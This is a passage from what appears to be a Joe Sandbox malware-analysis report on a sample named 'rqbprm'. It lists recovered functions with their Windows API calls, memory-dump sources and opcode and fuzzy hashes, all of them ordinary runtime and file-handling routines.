                                                                                              Function 00C8AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00C8AFDD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: String
                                                                                              • String ID: LCMapStringEx
                                                                                              • API String ID: 2568140703-3893581201
                                                                                              • Opcode ID: 486d26a8cc9c4279f2efc40bf147783683ce7256f706fcc77bdb5945c3cdc253
                                                                                              • Instruction ID: 8573cfff80631208f92d23246f5891d3fdedd407176fdab95b4feb13cad6e23d
                                                                                              • Opcode Fuzzy Hash: 486d26a8cc9c4279f2efc40bf147783683ce7256f706fcc77bdb5945c3cdc253
                                                                                              • Instruction Fuzzy Hash: 70014832505219BBCF02AF90DC0AEEE7F62EF08754F054256FE1866160CB328A31EB85
                                                                                              Function 00C8AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00C8A56F), ref: 00C8AF55
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountCriticalInitializeSectionSpin
                                                                                              • String ID: InitializeCriticalSectionEx
                                                                                              • API String ID: 2593887523-3084827643
                                                                                              • Opcode ID: 27973ccab17cbe18b012570587d795f3cac7dfff8261effa8bc8345c7c82b9b9
                                                                                              • Instruction ID: ad03bcef8894e35a25e77fe98af45874b05af96d7d5d58f62751d12dc36c7386
                                                                                              • Opcode Fuzzy Hash: 27973ccab17cbe18b012570587d795f3cac7dfff8261effa8bc8345c7c82b9b9
                                                                                              • Instruction Fuzzy Hash: 57F0E931646218BFCF05BF51CC0AE9E7F61EF04B11B414166FD0996260DB715E10A78E
                                                                                              Function 00C8ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Alloc
                                                                                              • String ID: FlsAlloc
                                                                                              • API String ID: 2773662609-671089009
                                                                                              • Opcode ID: 3ccb84a77b8d391f92c9daf48797485be15b2fd43820bdc19c0c2f9de91cf775
                                                                                              • Instruction ID: 750cb7ece84621fcc0858e4663d6c3be8ff50558d02fadde9adcd6239779e33b
                                                                                              • Opcode Fuzzy Hash: 3ccb84a77b8d391f92c9daf48797485be15b2fd43820bdc19c0c2f9de91cf775
                                                                                              • Instruction Fuzzy Hash: BEE0E5316462287BDA01AB65DC0AF6EBB54DB14B21B0202ABF805A7250DE715E1197DE
                                                                                              Function 00C8BBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00C8B7BB: GetOEMCP.KERNEL32(00000000,?,?,00C8BA44,?), ref: 00C8B7E6
                                                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00C8BA89,?,00000000), ref: 00C8BC64
                                                                                              • GetCPInfo.KERNEL32(00000000,00C8BA89,?,?,?,00C8BA89,?,00000000), ref: 00C8BC77
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: CodeInfoPageValid
                                                                                              • String ID:
                                                                                              • API String ID: 546120528-0
                                                                                              • Opcode ID: a50be414f55ce0b7260a6729fbaaf753e107bca3e14ea8c3c45a4c6108c5e780
                                                                                              • Instruction ID: 7a89bbb720d0a261fcaab3c4759d1c63033222cf8439c98becb0f8bccd376cd2
                                                                                              • Opcode Fuzzy Hash: a50be414f55ce0b7260a6729fbaaf753e107bca3e14ea8c3c45a4c6108c5e780
                                                                                              • Instruction Fuzzy Hash: 52515770900245AFDB20EF75C8816BBBBE4EF41308F18446FD4A68B252D7359E46DB98
                                                                                              Function 00C69A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00C69A50,?,?,00000000,?,?,00C68CBC,?), ref: 00C69BAB
                                                                                              • GetLastError.KERNEL32(?,00000000,00C68411,-00009570,00000000,000007F3), ref: 00C69BB6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer
                                                                                              • String ID:
                                                                                              • API String ID: 2976181284-0
                                                                                              • Opcode ID: bcdd027bf57826c64065a79b1ecc2ea3305691580979a37c32a734296b099377
                                                                                              • Instruction ID: 6fbdeb981a36cc5d2b171ab99e0940a20a592d1398e0b2fbeff77a0bb9611b7e
                                                                                              • Opcode Fuzzy Hash: bcdd027bf57826c64065a79b1ecc2ea3305691580979a37c32a734296b099377
                                                                                              • Instruction Fuzzy Hash: 8841CE316043418FDB34DF15E5C456AB7EDFFD9720F148A2EE8A183261D770EE458A51
                                                                                              Function 00C8BA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00C897E5: GetLastError.KERNEL32(?,00CA1030,00C84674,00CA1030,?,?,00C83F73,00000050,?,00CA1030,00000200), ref: 00C897E9
                                                                                                • Part of subcall function 00C897E5: _free.LIBCMT ref: 00C8981C
                                                                                                • Part of subcall function 00C897E5: SetLastError.KERNEL32(00000000,?,00CA1030,00000200), ref: 00C8985D
                                                                                                • Part of subcall function 00C897E5: _abort.LIBCMT ref: 00C89863
                                                                                                • Part of subcall function 00C8BB4E: _abort.LIBCMT ref: 00C8BB80
                                                                                                • Part of subcall function 00C8BB4E: _free.LIBCMT ref: 00C8BBB4
                                                                                                • Part of subcall function 00C8B7BB: GetOEMCP.KERNEL32(00000000,?,?,00C8BA44,?), ref: 00C8B7E6
                                                                                              • _free.LIBCMT ref: 00C8BA9F
                                                                                              • _free.LIBCMT ref: 00C8BAD5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorLast_abort
                                                                                              • String ID:
                                                                                              • API String ID: 2991157371-0
                                                                                              • Opcode ID: 1d5d24f8910496ccb5ddba80678274894429ed55ba708d4dc70af8f9003c327a
                                                                                              • Instruction ID: b2bcf197d4394e05e68dd507e38307d86bf622e3e3725640ca7fb1b3f029be87
                                                                                              • Opcode Fuzzy Hash: 1d5d24f8910496ccb5ddba80678274894429ed55ba708d4dc70af8f9003c327a
                                                                                              • Instruction Fuzzy Hash: 37310E31904209AFDB14FFA9D445BEDB7F5EF40328F25409AE4245B2A1EB325E44FB58
                                                                                              Function 00C61E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00C61E55
                                                                                                • Part of subcall function 00C63BBA: __EH_prolog.LIBCMT ref: 00C63BBF
                                                                                              • _wcslen.LIBCMT ref: 00C61EFD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2838827086-0
                                                                                              • Opcode ID: 9913a03494d8ba6841292968f3b3f59b5f273dc9be0dbc2172c08dfe7e567ec7
                                                                                              • Instruction ID: 9e84d095515dcaeeb399543c795c8733845c451871d2a90b3480cdca8b69b4e5
                                                                                              • Opcode Fuzzy Hash: 9913a03494d8ba6841292968f3b3f59b5f273dc9be0dbc2172c08dfe7e567ec7
                                                                                              • Instruction Fuzzy Hash: 9E314B71904249AFCF21DF99C985AEEBBF5AF48300F184069F845A7251CB329E01DB64
                                                                                              Function 00C69DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00C673BC,?,?,?,00000000), ref: 00C69DBC
                                                                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00C69E70
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$BuffersFlushTime
                                                                                              • String ID:
                                                                                              • API String ID: 1392018926-0
                                                                                              • Opcode ID: e6bf29dd5e906d19041aa1ff43c9ce8738dee4e8fdd1732231e1f0f0176902d9
                                                                                              • Instruction ID: c480f7fd1858ef7a9041a9729bc8695fe0b2377c3792290fb22a3b0788cc493e
                                                                                              • Opcode Fuzzy Hash: e6bf29dd5e906d19041aa1ff43c9ce8738dee4e8fdd1732231e1f0f0176902d9
                                                                                              • Instruction Fuzzy Hash: 1D21F2312482459BC724CF35C4D1AABBBE8EF51704F08481DF4E583151D339DA0D9B61
                                                                                              Function 00C6966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00C69F27,?,?,00C6771A), ref: 00C696E6
                                                                                              • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00C69F27,?,?,00C6771A), ref: 00C69716
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: b860cc5ab501d62fb48fa3bdf0ceab17e41ad70271e7ffcec0cc828651cb49fc
                                                                                              • Instruction ID: 2670185e2578adc62485d470cd971fc4c4d1e12ae598a48d7e3981a23d96fb0d
                                                                                              • Opcode Fuzzy Hash: b860cc5ab501d62fb48fa3bdf0ceab17e41ad70271e7ffcec0cc828651cb49fc
                                                                                              • Instruction Fuzzy Hash: D021CCB1104344AFE3708A65CCC9FB7B7DCEB49324F104A19FAE6C21D1C7B8A9849A71
                                                                                              Function 00C69E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00C69EC7
                                                                                              • GetLastError.KERNEL32 ref: 00C69ED4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer
                                                                                              • String ID:
                                                                                              • API String ID: 2976181284-0
                                                                                              • Opcode ID: a8b523d530c251b4d944d19118a4ba70be8ba399f8a39f176b4fab319a5f6568
                                                                                              • Instruction ID: 1974976da1a5ec7eb1147fe53c563883196818bd3a6c8b60388148c01ac45f5b
                                                                                              • Opcode Fuzzy Hash: a8b523d530c251b4d944d19118a4ba70be8ba399f8a39f176b4fab319a5f6568
                                                                                              • Instruction Fuzzy Hash: BD11E130600701ABD734C669C8C4BAAB7ECEB45370F604A2AE563D26D0D772EE4AC760
                                                                                              Function 00C88E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00C88E75
                                                                                                • Part of subcall function 00C88E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00C8CA2C,00000000,?,00C86CBE,?,00000008,?,00C891E0,?,?,?), ref: 00C88E38
                                                                                              • RtlReAllocateHeap.NTDLL(00000000,?,?,?,00000007,00CA1098,00C617CE,?,?,00000007,?,?,?,00C613D6,?,00000000), ref: 00C88EB1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap$_free
                                                                                              • String ID:
                                                                                              • API String ID: 1482568997-0
                                                                                              • Opcode ID: 5927cf569c0a6f9f50dd41819f6ccf53d4f5e6205c948cf883fed8bc120ba914
                                                                                              • Instruction ID: 1dff6817eb5f670dfa6f9c11ccdb17988eaacd9b636ef2dc304bb4056fe5aaa1
                                                                                              • Opcode Fuzzy Hash: 5927cf569c0a6f9f50dd41819f6ccf53d4f5e6205c948cf883fed8bc120ba914
                                                                                              • Instruction Fuzzy Hash: 6EF0213A20111266CB217B269C05F7F37589FC1778FE40126F82457991DF70DE0493AC
                                                                                              Function 00C7109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(?,?), ref: 00C710AB
                                                                                              • GetProcessAffinityMask.KERNEL32(00000000), ref: 00C710B2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$AffinityCurrentMask
                                                                                              • String ID:
                                                                                              • API String ID: 1231390398-0
                                                                                              • Opcode ID: 19828f89de47dde8abbb204d2a3451dc80b8eb25bee8a7042931728537df5c76
                                                                                              • Instruction ID: 0f283ca00be8858765cf432382697ae50afc5b7261e1d4332b57f693bd90e8f6
                                                                                              • Opcode Fuzzy Hash: 19828f89de47dde8abbb204d2a3451dc80b8eb25bee8a7042931728537df5c76
                                                                                              • Instruction Fuzzy Hash: 2BE0D832B10185EBCF198BB89C09AEF73DDEA44204318C176E817D3101FA34DF414760
                                                                                              Function 00C88268 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00C8BF30: GetEnvironmentStringsW.KERNEL32 ref: 00C8BF39
                                                                                                • Part of subcall function 00C8BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C8BF5C
                                                                                                • Part of subcall function 00C8BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00C8BF82
                                                                                                • Part of subcall function 00C8BF30: _free.LIBCMT ref: 00C8BF95
                                                                                                • Part of subcall function 00C8BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C8BFA4
                                                                                              • _free.LIBCMT ref: 00C882AE
                                                                                              • _free.LIBCMT ref: 00C882B5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                              • String ID:
                                                                                              • API String ID: 400815659-0
                                                                                              • Opcode ID: c594c3a4691293b7ec6d5c2ed67c4ef01879ad97383882955027f5d15b2c0be5
                                                                                              • Instruction ID: 54b3372e1e8ebb53ce8c8fb11dacab605695ea096bdcf49484efa978d34a58b9
                                                                                              • Opcode Fuzzy Hash: c594c3a4691293b7ec6d5c2ed67c4ef01879ad97383882955027f5d15b2c0be5
                                                                                              • Instruction Fuzzy Hash: 7CE02B33605D53459665327A6C02B6F06054F8133CBD6031AF920D75D3DE10890B27AE
                                                                                              Function 00C6A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00C6A325,?,?,?,00C6A175,?,00000001,00000000,?,?), ref: 00C6A501
                                                                                                • Part of subcall function 00C6BB03: _wcslen.LIBCMT ref: 00C6BB27
                                                                                              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00C6A325,?,?,?,00C6A175,?,00000001,00000000,?,?), ref: 00C6A532
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2673547680-0
                                                                                              • Opcode ID: b4d6236b615c6beb2e549ac887c314ef93c86fd613a7d9b70ca19e442e7c7fbc
                                                                                              • Instruction ID: fd8338f010d03cb7d810930c3f81a5a16a0b46ebd4110f6b698bb58f1e7d753c
                                                                                              • Opcode Fuzzy Hash: b4d6236b615c6beb2e549ac887c314ef93c86fd613a7d9b70ca19e442e7c7fbc
                                                                                              • Instruction Fuzzy Hash: 72F030322401497BDF115F61DC45FDE37ACAB04385F448051B949E5160EB71DED4EA60
                                                                                              Function 00C6A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DeleteFileW.KERNELBASE(000000FF,?,?,00C6977F,?,?,00C695CF,?,?,?,?,?,00C92641,000000FF), ref: 00C6A1F1
